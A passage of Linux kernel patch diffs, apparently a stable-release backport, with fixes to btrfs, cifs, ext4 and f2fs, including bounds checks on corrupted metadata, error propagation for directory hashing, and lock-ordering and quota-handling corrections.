+ static int __add_block_group_free_space(struct btrfs_trans_handle *trans,
+ 					struct btrfs_block_group *block_group,
+ 					struct btrfs_path *path)
+diff --git a/fs/btrfs/free-space-tree.h b/fs/btrfs/free-space-tree.h
+index dc2463e4cfe3c..6d5551d0ced81 100644
+--- a/fs/btrfs/free-space-tree.h
++++ b/fs/btrfs/free-space-tree.h
+@@ -18,7 +18,8 @@ struct btrfs_caching_control;
+ 
+ void set_free_space_tree_thresholds(struct btrfs_block_group *block_group);
+ int btrfs_create_free_space_tree(struct btrfs_fs_info *fs_info);
+-int btrfs_clear_free_space_tree(struct btrfs_fs_info *fs_info);
++int btrfs_delete_free_space_tree(struct btrfs_fs_info *fs_info);
++int btrfs_rebuild_free_space_tree(struct btrfs_fs_info *fs_info);
+ int load_free_space_tree(struct btrfs_caching_control *caching_ctl);
+ int add_block_group_free_space(struct btrfs_trans_handle *trans,
+ 			       struct btrfs_block_group *block_group);
+diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
+index 0e516aefbf51b..56e9efbffd58e 100644
+--- a/fs/btrfs/inode.c
++++ b/fs/btrfs/inode.c
+@@ -3237,6 +3237,9 @@ int btrfs_finish_ordered_io(struct btrfs_ordered_extent *ordered_extent)
+ 		btrfs_rewrite_logical_zoned(ordered_extent);
+ 		btrfs_zone_finish_endio(fs_info, ordered_extent->disk_bytenr,
+ 					ordered_extent->disk_num_bytes);
++	} else if (btrfs_is_data_reloc_root(inode->root)) {
++		btrfs_zone_finish_endio(fs_info, ordered_extent->disk_bytenr,
++					ordered_extent->disk_num_bytes);
+ 	}
+ 
+ 	btrfs_free_io_failure_record(inode, start, end);
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index 0cebc203c4ccc..9de647e48e7eb 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -443,7 +443,9 @@ void btrfs_exclop_balance(struct btrfs_fs_info *fs_info,
+ 	case BTRFS_EXCLOP_BALANCE_PAUSED:
+ 		spin_lock(&fs_info->super_lock);
+ 		ASSERT(fs_info->exclusive_operation == BTRFS_EXCLOP_BALANCE ||
+-		       fs_info->exclusive_operation == BTRFS_EXCLOP_DEV_ADD);
++		       fs_info->exclusive_operation == BTRFS_EXCLOP_DEV_ADD ||
++		       fs_info->exclusive_operation == BTRFS_EXCLOP_NONE ||
++		       fs_info->exclusive_operation == BTRFS_EXCLOP_BALANCE_PAUSED);
+ 		fs_info->exclusive_operation = BTRFS_EXCLOP_BALANCE_PAUSED;
+ 		spin_unlock(&fs_info->super_lock);
+ 		break;
+diff --git a/fs/btrfs/print-tree.c b/fs/btrfs/print-tree.c
+index dd8777872143a..228eeb04d03d3 100644
+--- a/fs/btrfs/print-tree.c
++++ b/fs/btrfs/print-tree.c
+@@ -148,10 +148,10 @@ static void print_extent_item(struct extent_buffer *eb, int slot, int type)
+ 			pr_cont("shared data backref parent %llu count %u\n",
+ 			       offset, btrfs_shared_data_ref_count(eb, sref));
+ 			/*
+-			 * offset is supposed to be a tree block which
+-			 * must be aligned to nodesize.
++			 * Offset is supposed to be a tree block which must be
++			 * aligned to sectorsize.
+ 			 */
+-			if (!IS_ALIGNED(offset, eb->fs_info->nodesize))
++			if (!IS_ALIGNED(offset, eb->fs_info->sectorsize))
+ 				pr_info(
+ 			"\t\t\t(parent %llu not aligned to sectorsize %u)\n",
+ 				     offset, eb->fs_info->sectorsize);
+diff --git a/fs/btrfs/super.c b/fs/btrfs/super.c
+index e43b16199e22b..6438300fa2461 100644
+--- a/fs/btrfs/super.c
++++ b/fs/btrfs/super.c
+@@ -1136,7 +1136,11 @@ out:
+ 	    !btrfs_test_opt(info, CLEAR_CACHE)) {
+ 		btrfs_err(info, "cannot disable free space tree");
+ 		ret = -EINVAL;
+-
++	}
++	if (btrfs_fs_compat_ro(info, BLOCK_GROUP_TREE) &&
++	     !btrfs_test_opt(info, FREE_SPACE_TREE)) {
++		btrfs_err(info, "cannot disable free space tree with block-group-tree feature");
++		ret = -EINVAL;
+ 	}
+ 	if (!ret)
+ 		ret = btrfs_check_mountopts_zoned(info);
+diff --git a/fs/btrfs/zoned.c b/fs/btrfs/zoned.c
+index e97c5a1ac95d6..836babd23db52 100644
+--- a/fs/btrfs/zoned.c
++++ b/fs/btrfs/zoned.c
+@@ -119,10 +119,9 @@ static int sb_write_pointer(struct block_device *bdev, struct blk_zone *zones,
+ 		int i;
+ 
+ 		for (i = 0; i < BTRFS_NR_SB_LOG_ZONES; i++) {
+-			u64 bytenr;
+-
+-			bytenr = ((zones[i].start + zones[i].len)
+-				   << SECTOR_SHIFT) - BTRFS_SUPER_INFO_SIZE;
++			u64 zone_end = (zones[i].start + zones[i].capacity) << SECTOR_SHIFT;
++			u64 bytenr = ALIGN_DOWN(zone_end, BTRFS_SUPER_INFO_SIZE) -
++						BTRFS_SUPER_INFO_SIZE;
+ 
+ 			page[i] = read_cache_page_gfp(mapping,
+ 					bytenr >> PAGE_SHIFT, GFP_NOFS);
+@@ -1163,12 +1162,12 @@ int btrfs_ensure_empty_zones(struct btrfs_device *device, u64 start, u64 size)
+ 		return -ERANGE;
+ 
+ 	/* All the zones are conventional */
+-	if (find_next_bit(zinfo->seq_zones, begin, end) == end)
++	if (find_next_bit(zinfo->seq_zones, end, begin) == end)
+ 		return 0;
+ 
+ 	/* All the zones are sequential and empty */
+-	if (find_next_zero_bit(zinfo->seq_zones, begin, end) == end &&
+-	    find_next_zero_bit(zinfo->empty_zones, begin, end) == end)
++	if (find_next_zero_bit(zinfo->seq_zones, end, begin) == end &&
++	    find_next_zero_bit(zinfo->empty_zones, end, begin) == end)
+ 		return 0;
+ 
+ 	for (pos = start; pos < start + size; pos += zinfo->zone_size) {
+@@ -1605,11 +1604,11 @@ void btrfs_redirty_list_add(struct btrfs_transaction *trans,
+ 	    !list_empty(&eb->release_list))
+ 		return;
+ 
++	memzero_extent_buffer(eb, 0, eb->len);
++	set_bit(EXTENT_BUFFER_NO_CHECK, &eb->bflags);
+ 	set_extent_buffer_dirty(eb);
+ 	set_extent_bits_nowait(&trans->dirty_pages, eb->start,
+ 			       eb->start + eb->len - 1, EXTENT_DIRTY);
+-	memzero_extent_buffer(eb, 0, eb->len);
+-	set_bit(EXTENT_BUFFER_NO_CHECK, &eb->bflags);
+ 
+ 	spin_lock(&trans->releasing_ebs_lock);
+ 	list_add_tail(&eb->release_list, &trans->releasing_ebs);
+diff --git a/fs/cifs/cifsfs.c b/fs/cifs/cifsfs.c
+index 03e3e95cf25b2..078df1e2dd18a 100644
+--- a/fs/cifs/cifsfs.c
++++ b/fs/cifs/cifsfs.c
+@@ -743,6 +743,7 @@ static void cifs_umount_begin(struct super_block *sb)
+ 	spin_unlock(&tcon->tc_lock);
+ 	spin_unlock(&cifs_tcp_ses_lock);
+ 
++	cifs_close_all_deferred_files(tcon);
+ 	/* cancel_brl_requests(tcon); */ /* BB mark all brl mids as exiting */
+ 	/* cancel_notify_requests(tcon); */
+ 	if (tcon->ses && tcon->ses->server) {
+@@ -758,6 +759,20 @@ static void cifs_umount_begin(struct super_block *sb)
+ 	return;
+ }
+ 
++static int cifs_freeze(struct super_block *sb)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	struct cifs_tcon *tcon;
++
++	if (cifs_sb == NULL)
++		return 0;
++
++	tcon = cifs_sb_master_tcon(cifs_sb);
++
++	cifs_close_all_deferred_files(tcon);
++	return 0;
++}
++
+ #ifdef CONFIG_CIFS_STATS2
+ static int cifs_show_stats(struct seq_file *s, struct dentry *root)
+ {
+@@ -796,6 +811,7 @@ static const struct super_operations cifs_super_ops = {
+ 	as opens */
+ 	.show_options = cifs_show_options,
+ 	.umount_begin   = cifs_umount_begin,
++	.freeze_fs      = cifs_freeze,
+ #ifdef CONFIG_CIFS_STATS2
+ 	.show_stats = cifs_show_stats,
+ #endif
+diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c
+index 21b31d1640e57..935fe198a4baf 100644
+--- a/fs/cifs/connect.c
++++ b/fs/cifs/connect.c
+@@ -2742,6 +2742,13 @@ cifs_match_super(struct super_block *sb, void *data)
+ 
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 	cifs_sb = CIFS_SB(sb);
++
++	/* We do not want to use a superblock that has been shutdown */
++	if (CIFS_MOUNT_SHUTDOWN & cifs_sb->mnt_cifs_flags) {
++		spin_unlock(&cifs_tcp_ses_lock);
++		return 0;
++	}
++
+ 	tlink = cifs_get_tlink(cifs_sb_master_tlink(cifs_sb));
+ 	if (tlink == NULL) {
+ 		/* can not match superblock if tlink were ever null */
+diff --git a/fs/cifs/smb2ops.c b/fs/cifs/smb2ops.c
+index ccf311750927b..7468f8baf4990 100644
+--- a/fs/cifs/smb2ops.c
++++ b/fs/cifs/smb2ops.c
+@@ -1682,7 +1682,7 @@ smb2_copychunk_range(const unsigned int xid,
+ 		pcchunk->SourceOffset = cpu_to_le64(src_off);
+ 		pcchunk->TargetOffset = cpu_to_le64(dest_off);
+ 		pcchunk->Length =
+-			cpu_to_le32(min_t(u32, len, tcon->max_bytes_chunk));
++			cpu_to_le32(min_t(u64, len, tcon->max_bytes_chunk));
+ 
+ 		/* Request server copy to target from src identified by key */
+ 		kfree(retbuf);
+diff --git a/fs/ext4/balloc.c b/fs/ext4/balloc.c
+index 8ff4b9192a9f5..f2c415f31b755 100644
+--- a/fs/ext4/balloc.c
++++ b/fs/ext4/balloc.c
+@@ -303,6 +303,22 @@ struct ext4_group_desc * ext4_get_group_desc(struct super_block *sb,
+ 	return desc;
+ }
+ 
++static ext4_fsblk_t ext4_valid_block_bitmap_padding(struct super_block *sb,
++						    ext4_group_t block_group,
++						    struct buffer_head *bh)
++{
++	ext4_grpblk_t next_zero_bit;
++	unsigned long bitmap_size = sb->s_blocksize * 8;
++	unsigned int offset = num_clusters_in_group(sb, block_group);
++
++	if (bitmap_size <= offset)
++		return 0;
++
++	next_zero_bit = ext4_find_next_zero_bit(bh->b_data, bitmap_size, offset);
++
++	return (next_zero_bit < bitmap_size ? next_zero_bit : 0);
++}
++
+ /*
+  * Return the block number which was discovered to be invalid, or 0 if
+  * the block bitmap is valid.
+@@ -401,6 +417,15 @@ static int ext4_validate_block_bitmap(struct super_block *sb,
+ 					EXT4_GROUP_INFO_BBITMAP_CORRUPT);
+ 		return -EFSCORRUPTED;
+ 	}
++	blk = ext4_valid_block_bitmap_padding(sb, block_group, bh);
++	if (unlikely(blk != 0)) {
++		ext4_unlock_group(sb, block_group);
++		ext4_error(sb, "bg %u: block %llu: padding at end of block bitmap is not set",
++			   block_group, blk);
++		ext4_mark_group_bitmap_corrupted(sb, block_group,
++						 EXT4_GROUP_INFO_BBITMAP_CORRUPT);
++		return -EFSCORRUPTED;
++	}
+ 	set_buffer_verified(bh);
+ verified:
+ 	ext4_unlock_group(sb, block_group);
+diff --git a/fs/ext4/extents_status.c b/fs/ext4/extents_status.c
+index 7ada374ff27d7..44e83521bfded 100644
+--- a/fs/ext4/extents_status.c
++++ b/fs/ext4/extents_status.c
+@@ -269,14 +269,12 @@ static void __es_find_extent_range(struct inode *inode,
+ 
+ 	/* see if the extent has been cached */
+ 	es->es_lblk = es->es_len = es->es_pblk = 0;
+-	if (tree->cache_es) {
+-		es1 = tree->cache_es;
+-		if (in_range(lblk, es1->es_lblk, es1->es_len)) {
+-			es_debug("%u cached by [%u/%u) %llu %x\n",
+-				 lblk, es1->es_lblk, es1->es_len,
+-				 ext4_es_pblock(es1), ext4_es_status(es1));
+-			goto out;
+-		}
++	es1 = READ_ONCE(tree->cache_es);
++	if (es1 && in_range(lblk, es1->es_lblk, es1->es_len)) {
++		es_debug("%u cached by [%u/%u) %llu %x\n",
++			 lblk, es1->es_lblk, es1->es_len,
++			 ext4_es_pblock(es1), ext4_es_status(es1));
++		goto out;
+ 	}
+ 
+ 	es1 = __es_tree_search(&tree->root, lblk);
+@@ -295,7 +293,7 @@ out:
+ 	}
+ 
+ 	if (es1 && matching_fn(es1)) {
+-		tree->cache_es = es1;
++		WRITE_ONCE(tree->cache_es, es1);
+ 		es->es_lblk = es1->es_lblk;
+ 		es->es_len = es1->es_len;
+ 		es->es_pblk = es1->es_pblk;
+@@ -933,14 +931,12 @@ int ext4_es_lookup_extent(struct inode *inode, ext4_lblk_t lblk,
+ 
+ 	/* find extent in cache firstly */
+ 	es->es_lblk = es->es_len = es->es_pblk = 0;
+-	if (tree->cache_es) {
+-		es1 = tree->cache_es;
+-		if (in_range(lblk, es1->es_lblk, es1->es_len)) {
+-			es_debug("%u cached by [%u/%u)\n",
+-				 lblk, es1->es_lblk, es1->es_len);
+-			found = 1;
+-			goto out;
+-		}
++	es1 = READ_ONCE(tree->cache_es);
++	if (es1 && in_range(lblk, es1->es_lblk, es1->es_len)) {
++		es_debug("%u cached by [%u/%u)\n",
++			 lblk, es1->es_lblk, es1->es_len);
++		found = 1;
++		goto out;
+ 	}
+ 
+ 	node = tree->root.rb_node;
+diff --git a/fs/ext4/hash.c b/fs/ext4/hash.c
+index 147b5241dd94f..46c3423ddfa17 100644
+--- a/fs/ext4/hash.c
++++ b/fs/ext4/hash.c
+@@ -277,7 +277,11 @@ static int __ext4fs_dirhash(const struct inode *dir, const char *name, int len,
+ 	}
+ 	default:
+ 		hinfo->hash = 0;
+-		return -1;
++		hinfo->minor_hash = 0;
++		ext4_warning(dir->i_sb,
++			     "invalid/unsupported hash tree version %u",
++			     hinfo->hash_version);
++		return -EINVAL;
+ 	}
+ 	hash = hash & ~1;
+ 	if (hash == (EXT4_HTREE_EOF_32BIT << 1))
+diff --git a/fs/ext4/inline.c b/fs/ext4/inline.c
+index c4475a74c7626..3a91be1d9bbe7 100644
+--- a/fs/ext4/inline.c
++++ b/fs/ext4/inline.c
+@@ -34,6 +34,7 @@ static int get_max_inline_xattr_value_size(struct inode *inode,
+ 	struct ext4_xattr_ibody_header *header;
+ 	struct ext4_xattr_entry *entry;
+ 	struct ext4_inode *raw_inode;
++	void *end;
+ 	int free, min_offs;
+ 
+ 	if (!EXT4_INODE_HAS_XATTR_SPACE(inode))
+@@ -57,14 +58,23 @@ static int get_max_inline_xattr_value_size(struct inode *inode,
+ 	raw_inode = ext4_raw_inode(iloc);
+ 	header = IHDR(inode, raw_inode);
+ 	entry = IFIRST(header);
++	end = (void *)raw_inode + EXT4_SB(inode->i_sb)->s_inode_size;
+ 
+ 	/* Compute min_offs. */
+-	for (; !IS_LAST_ENTRY(entry); entry = EXT4_XATTR_NEXT(entry)) {
++	while (!IS_LAST_ENTRY(entry)) {
++		void *next = EXT4_XATTR_NEXT(entry);
++
++		if (next >= end) {
++			EXT4_ERROR_INODE(inode,
++					 "corrupt xattr in inline inode");
++			return 0;
++		}
+ 		if (!entry->e_value_inum && entry->e_value_size) {
+ 			size_t offs = le16_to_cpu(entry->e_value_offs);
+ 			if (offs < min_offs)
+ 				min_offs = offs;
+ 		}
++		entry = next;
+ 	}
+ 	free = min_offs -
+ 		((void *)entry - (void *)IFIRST(header)) - sizeof(__u32);
+@@ -351,7 +361,7 @@ static int ext4_update_inline_data(handle_t *handle, struct inode *inode,
+ 
+ 	error = ext4_xattr_ibody_get(inode, i.name_index, i.name,
+ 				     value, len);
+-	if (error == -ENODATA)
++	if (error < 0)
+ 		goto out;
+ 
+ 	BUFFER_TRACE(is.iloc.bh, "get_write_access");
+@@ -1178,6 +1188,7 @@ static int ext4_finish_convert_inline_dir(handle_t *handle,
+ 		ext4_initialize_dirent_tail(dir_block,
+ 					    inode->i_sb->s_blocksize);
+ 	set_buffer_uptodate(dir_block);
++	unlock_buffer(dir_block);
+ 	err = ext4_handle_dirty_dirblock(handle, inode, dir_block);
+ 	if (err)
+ 		return err;
+@@ -1252,6 +1263,7 @@ static int ext4_convert_inline_data_nolock(handle_t *handle,
+ 	if (!S_ISDIR(inode->i_mode)) {
+ 		memcpy(data_bh->b_data, buf, inline_size);
+ 		set_buffer_uptodate(data_bh);
++		unlock_buffer(data_bh);
+ 		error = ext4_handle_dirty_metadata(handle,
+ 						   inode, data_bh);
+ 	} else {
+@@ -1259,7 +1271,6 @@ static int ext4_convert_inline_data_nolock(handle_t *handle,
+ 						       buf, inline_size);
+ 	}
+ 
+-	unlock_buffer(data_bh);
+ out_restore:
+ 	if (error)
+ 		ext4_restore_inline_data(handle, inode, iloc, buf, inline_size);
+diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
+index 42003b5c4cadc..ffc810436ef21 100644
+--- a/fs/ext4/inode.c
++++ b/fs/ext4/inode.c
+@@ -3503,7 +3503,7 @@ static int ext4_iomap_overwrite_begin(struct inode *inode, loff_t offset,
+ 	 */
+ 	flags &= ~IOMAP_WRITE;
+ 	ret = ext4_iomap_begin(inode, offset, length, flags, iomap, srcmap);
+-	WARN_ON_ONCE(iomap->type != IOMAP_MAPPED);
++	WARN_ON_ONCE(!ret && iomap->type != IOMAP_MAPPED);
+ 	return ret;
+ }
+ 
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index 9dad93059945b..912c4a1093fe5 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -4820,7 +4820,11 @@ ext4_mb_release_group_pa(struct ext4_buddy *e4b,
+ 	trace_ext4_mb_release_group_pa(sb, pa);
+ 	BUG_ON(pa->pa_deleted == 0);
+ 	ext4_get_group_no_and_offset(sb, pa->pa_pstart, &group, &bit);
+-	BUG_ON(group != e4b->bd_group && pa->pa_len != 0);
++	if (unlikely(group != e4b->bd_group && pa->pa_len != 0)) {
++		ext4_warning(sb, "bad group: expected %u, group %u, pa_start %llu",
++			     e4b->bd_group, group, pa->pa_pstart);
++		return 0;
++	}
+ 	mb_free_blocks(pa->pa_inode, e4b, bit, pa->pa_len);
+ 	atomic_add(pa->pa_len, &EXT4_SB(sb)->s_mb_discarded);
+ 	trace_ext4_mballoc_discard(sb, NULL, group, bit, pa->pa_len);
+diff --git a/fs/ext4/mmp.c b/fs/ext4/mmp.c
+index 588cb09c5291f..23930ed3cbda6 100644
+--- a/fs/ext4/mmp.c
++++ b/fs/ext4/mmp.c
+@@ -39,28 +39,36 @@ static void ext4_mmp_csum_set(struct super_block *sb, struct mmp_struct *mmp)
+  * Write the MMP block using REQ_SYNC to try to get the block on-disk
+  * faster.
+  */
+-static int write_mmp_block(struct super_block *sb, struct buffer_head *bh)
++static int write_mmp_block_thawed(struct super_block *sb,
++				  struct buffer_head *bh)
+ {
+ 	struct mmp_struct *mmp = (struct mmp_struct *)(bh->b_data);
+ 
+-	/*
+-	 * We protect against freezing so that we don't create dirty buffers
+-	 * on frozen filesystem.
+-	 */
+-	sb_start_write(sb);
+ 	ext4_mmp_csum_set(sb, mmp);
+ 	lock_buffer(bh);
+ 	bh->b_end_io = end_buffer_write_sync;
+ 	get_bh(bh);
+ 	submit_bh(REQ_OP_WRITE | REQ_SYNC | REQ_META | REQ_PRIO, bh);
+ 	wait_on_buffer(bh);
+-	sb_end_write(sb);
+ 	if (unlikely(!buffer_uptodate(bh)))
+ 		return -EIO;
+-
+ 	return 0;
+ }
+ 
++static int write_mmp_block(struct super_block *sb, struct buffer_head *bh)
++{
++	int err;
++
++	/*
++	 * We protect against freezing so that we don't create dirty buffers
++	 * on frozen filesystem.
++	 */
++	sb_start_write(sb);
++	err = write_mmp_block_thawed(sb, bh);
++	sb_end_write(sb);
++	return err;
++}
++
+ /*
+  * Read the MMP block. It _must_ be read from disk and hence we clear the
+  * uptodate flag on the buffer.
+@@ -346,7 +354,11 @@ skip:
+ 	seq = mmp_new_seq();
+ 	mmp->mmp_seq = cpu_to_le32(seq);
+ 
+-	retval = write_mmp_block(sb, bh);
++	/*
++	 * On mount / remount we are protected against fs freezing (by s_umount
++	 * semaphore) and grabbing freeze protection upsets lockdep
++	 */
++	retval = write_mmp_block_thawed(sb, bh);
+ 	if (retval)
+ 		goto failed;
+ 
+diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
+index 56f09598448b4..5a3dbbabe23af 100644
+--- a/fs/ext4/namei.c
++++ b/fs/ext4/namei.c
+@@ -674,7 +674,7 @@ static struct stats dx_show_leaf(struct inode *dir,
+ 				len = de->name_len;
+ 				if (!IS_ENCRYPTED(dir)) {
+ 					/* Directory is not encrypted */
+-					ext4fs_dirhash(dir, de->name,
++					(void) ext4fs_dirhash(dir, de->name,
+ 						de->name_len, &h);
+ 					printk("%*.s:(U)%x.%u ", len,
+ 					       name, h.hash,
+@@ -709,8 +709,9 @@ static struct stats dx_show_leaf(struct inode *dir,
+ 					if (IS_CASEFOLDED(dir))
+ 						h.hash = EXT4_DIRENT_HASH(de);
+ 					else
+-						ext4fs_dirhash(dir, de->name,
+-						       de->name_len, &h);
++						(void) ext4fs_dirhash(dir,
++							de->name,
++							de->name_len, &h);
+ 					printk("%*.s:(E)%x.%u ", len, name,
+ 					       h.hash, (unsigned) ((char *) de
+ 								   - base));
+@@ -720,7 +721,8 @@ static struct stats dx_show_leaf(struct inode *dir,
+ #else
+ 				int len = de->name_len;
+ 				char *name = de->name;
+-				ext4fs_dirhash(dir, de->name, de->name_len, &h);
++				(void) ext4fs_dirhash(dir, de->name,
++						      de->name_len, &h);
+ 				printk("%*.s:%x.%u ", len, name, h.hash,
+ 				       (unsigned) ((char *) de - base));
+ #endif
+@@ -849,8 +851,14 @@ dx_probe(struct ext4_filename *fname, struct inode *dir,
+ 	hinfo->seed = EXT4_SB(dir->i_sb)->s_hash_seed;
+ 	/* hash is already computed for encrypted casefolded directory */
+ 	if (fname && fname_name(fname) &&
+-				!(IS_ENCRYPTED(dir) && IS_CASEFOLDED(dir)))
+-		ext4fs_dirhash(dir, fname_name(fname), fname_len(fname), hinfo);
++	    !(IS_ENCRYPTED(dir) && IS_CASEFOLDED(dir))) {
++		int ret = ext4fs_dirhash(dir, fname_name(fname),
++					 fname_len(fname), hinfo);
++		if (ret < 0) {
++			ret_err = ERR_PTR(ret);
++			goto fail;
++		}
++	}
+ 	hash = hinfo->hash;
+ 
+ 	if (root->info.unused_flags & 1) {
+@@ -1111,7 +1119,12 @@ static int htree_dirblock_to_tree(struct file *dir_file,
+ 				hinfo->minor_hash = 0;
+ 			}
+ 		} else {
+-			ext4fs_dirhash(dir, de->name, de->name_len, hinfo);
++			err = ext4fs_dirhash(dir, de->name,
++					     de->name_len, hinfo);
++			if (err < 0) {
++				count = err;
++				goto errout;
++			}
+ 		}
+ 		if ((hinfo->hash < start_hash) ||
+ 		    ((hinfo->hash == start_hash) &&
+@@ -1313,8 +1326,12 @@ static int dx_make_map(struct inode *dir, struct buffer_head *bh,
+ 		if (de->name_len && de->inode) {
+ 			if (ext4_hash_in_dirent(dir))
+ 				h.hash = EXT4_DIRENT_HASH(de);
+-			else
+-				ext4fs_dirhash(dir, de->name, de->name_len, &h);
++			else {
++				int err = ext4fs_dirhash(dir, de->name,
++						     de->name_len, &h);
++				if (err < 0)
++					return err;
++			}
+ 			map_tail--;
+ 			map_tail->hash = h.hash;
+ 			map_tail->offs = ((char *) de - base)>>2;
+@@ -1452,10 +1469,9 @@ int ext4_fname_setup_ci_filename(struct inode *dir, const struct qstr *iname,
+ 	hinfo->hash_version = DX_HASH_SIPHASH;
+ 	hinfo->seed = NULL;
+ 	if (cf_name->name)
+-		ext4fs_dirhash(dir, cf_name->name, cf_name->len, hinfo);
++		return ext4fs_dirhash(dir, cf_name->name, cf_name->len, hinfo);
+ 	else
+-		ext4fs_dirhash(dir, iname->name, iname->len, hinfo);
+-	return 0;
++		return ext4fs_dirhash(dir, iname->name, iname->len, hinfo);
+ }
+ #endif
+ 
+@@ -2298,10 +2314,15 @@ static int make_indexed_dir(handle_t *handle, struct ext4_filename *fname,
+ 	fname->hinfo.seed = EXT4_SB(dir->i_sb)->s_hash_seed;
+ 
+ 	/* casefolded encrypted hashes are computed on fname setup */
+-	if (!ext4_hash_in_dirent(dir))
+-		ext4fs_dirhash(dir, fname_name(fname),
+-				fname_len(fname), &fname->hinfo);
+-
++	if (!ext4_hash_in_dirent(dir)) {
++		int err = ext4fs_dirhash(dir, fname_name(fname),
++					 fname_len(fname), &fname->hinfo);
++		if (err < 0) {
++			brelse(bh2);
++			brelse(bh);
++			return err;
++		}
++	}
+ 	memset(frames, 0, sizeof(frames));
+ 	frame = frames;
+ 	frame->entries = entries;
+diff --git a/fs/ext4/super.c b/fs/ext4/super.c
+index 2528e8216c334..d542f068ca99f 100644
+--- a/fs/ext4/super.c
++++ b/fs/ext4/super.c
+@@ -3195,11 +3195,9 @@ static __le16 ext4_group_desc_csum(struct super_block *sb, __u32 block_group,
+ 	crc = crc16(crc, (__u8 *)gdp, offset);
+ 	offset += sizeof(gdp->bg_checksum); /* skip checksum */
+ 	/* for checksum of struct ext4_group_desc do the rest...*/
+-	if (ext4_has_feature_64bit(sb) &&
+-	    offset < le16_to_cpu(sbi->s_es->s_desc_size))
++	if (ext4_has_feature_64bit(sb) && offset < sbi->s_desc_size)
+ 		crc = crc16(crc, (__u8 *)gdp + offset,
+-			    le16_to_cpu(sbi->s_es->s_desc_size) -
+-				offset);
++			    sbi->s_desc_size - offset);
+ 
+ out:
+ 	return cpu_to_le16(crc);
+@@ -6568,9 +6566,6 @@ static int __ext4_remount(struct fs_context *fc, struct super_block *sb)
+ 	}
+ 
+ #ifdef CONFIG_QUOTA
+-	/* Release old quota file names */
+-	for (i = 0; i < EXT4_MAXQUOTAS; i++)
+-		kfree(old_opts.s_qf_names[i]);
+ 	if (enable_quota) {
+ 		if (sb_any_quota_suspended(sb))
+ 			dquot_resume(sb, -1);
+@@ -6580,6 +6575,9 @@ static int __ext4_remount(struct fs_context *fc, struct super_block *sb)
+ 				goto restore_opts;
+ 		}
+ 	}
++	/* Release old quota file names */
++	for (i = 0; i < EXT4_MAXQUOTAS; i++)
++		kfree(old_opts.s_qf_names[i]);
+ #endif
+ 	if (!test_opt(sb, BLOCK_VALIDITY) && sbi->s_system_blks)
+ 		ext4_release_system_zone(sb);
+@@ -6590,6 +6588,13 @@ static int __ext4_remount(struct fs_context *fc, struct super_block *sb)
+ 	return 0;
+ 
+ restore_opts:
++	/*
++	 * If there was a failing r/w to ro transition, we may need to
++	 * re-enable quota
++	 */
++	if ((sb->s_flags & SB_RDONLY) && !(old_sb_flags & SB_RDONLY) &&
++	    sb_any_quota_suspended(sb))
++		dquot_resume(sb, -1);
+ 	sb->s_flags = old_sb_flags;
+ 	sbi->s_mount_opt = old_opts.s_mount_opt;
+ 	sbi->s_mount_opt2 = old_opts.s_mount_opt2;
+diff --git a/fs/ext4/xattr.c b/fs/ext4/xattr.c
+index b17c1b90e1224..b1b8fe86ccdbd 100644
+--- a/fs/ext4/xattr.c
++++ b/fs/ext4/xattr.c
+@@ -2564,6 +2564,7 @@ static int ext4_xattr_move_to_block(handle_t *handle, struct inode *inode,
+ 		.in_inode = !!entry->e_value_inum,
+ 	};
+ 	struct ext4_xattr_ibody_header *header = IHDR(inode, raw_inode);
++	int needs_kvfree = 0;
+ 	int error;
+ 
+ 	is = kzalloc(sizeof(struct ext4_xattr_ibody_find), GFP_NOFS);
+@@ -2586,7 +2587,7 @@ static int ext4_xattr_move_to_block(handle_t *handle, struct inode *inode,
+ 			error = -ENOMEM;
+ 			goto out;
+ 		}
+-
++		needs_kvfree = 1;
+ 		error = ext4_xattr_inode_get(inode, entry, buffer, value_size);
+ 		if (error)
+ 			goto out;
+@@ -2625,7 +2626,7 @@ static int ext4_xattr_move_to_block(handle_t *handle, struct inode *inode,
+ 
+ out:
+ 	kfree(b_entry_name);
+-	if (entry->e_value_inum && buffer)
++	if (needs_kvfree && buffer)
+ 		kvfree(buffer);
+ 	if (is)
+ 		brelse(is->iloc.bh);
+diff --git a/fs/f2fs/data.c b/fs/f2fs/data.c
+index 770a606eb3f6a..de6b056f090b3 100644
+--- a/fs/f2fs/data.c
++++ b/fs/f2fs/data.c
+@@ -1134,7 +1134,7 @@ void f2fs_update_data_blkaddr(struct dnode_of_data *dn, block_t blkaddr)
+ {
+ 	dn->data_blkaddr = blkaddr;
+ 	f2fs_set_data_blkaddr(dn);
+-	f2fs_update_extent_cache(dn);
++	f2fs_update_read_extent_cache(dn);
+ }
+ 
+ /* dn->ofs_in_node will be returned with up-to-date last block pointer */
+@@ -1203,7 +1203,7 @@ int f2fs_get_block(struct dnode_of_data *dn, pgoff_t index)
+ 	struct extent_info ei = {0, };
+ 	struct inode *inode = dn->inode;
+ 
+-	if (f2fs_lookup_extent_cache(inode, index, &ei)) {
++	if (f2fs_lookup_read_extent_cache(inode, index, &ei)) {
+ 		dn->data_blkaddr = ei.blk + index - ei.fofs;
+ 		return 0;
+ 	}
+@@ -1224,7 +1224,7 @@ struct page *f2fs_get_read_data_page(struct inode *inode, pgoff_t index,
+ 	if (!page)
+ 		return ERR_PTR(-ENOMEM);
+ 
+-	if (f2fs_lookup_extent_cache(inode, index, &ei)) {
++	if (f2fs_lookup_read_extent_cache(inode, index, &ei)) {
+ 		dn.data_blkaddr = ei.blk + index - ei.fofs;
+ 		if (!f2fs_is_valid_blkaddr(F2FS_I_SB(inode), dn.data_blkaddr,
+ 						DATA_GENERIC_ENHANCE_READ)) {
+@@ -1486,7 +1486,7 @@ int f2fs_map_blocks(struct inode *inode, struct f2fs_map_blocks *map,
+ 	pgofs =	(pgoff_t)map->m_lblk;
+ 	end = pgofs + maxblocks;
+ 
+-	if (!create && f2fs_lookup_extent_cache(inode, pgofs, &ei)) {
++	if (!create && f2fs_lookup_read_extent_cache(inode, pgofs, &ei)) {
+ 		if (f2fs_lfs_mode(sbi) && flag == F2FS_GET_BLOCK_DIO &&
+ 							map->m_may_create)
+ 			goto next_dnode;
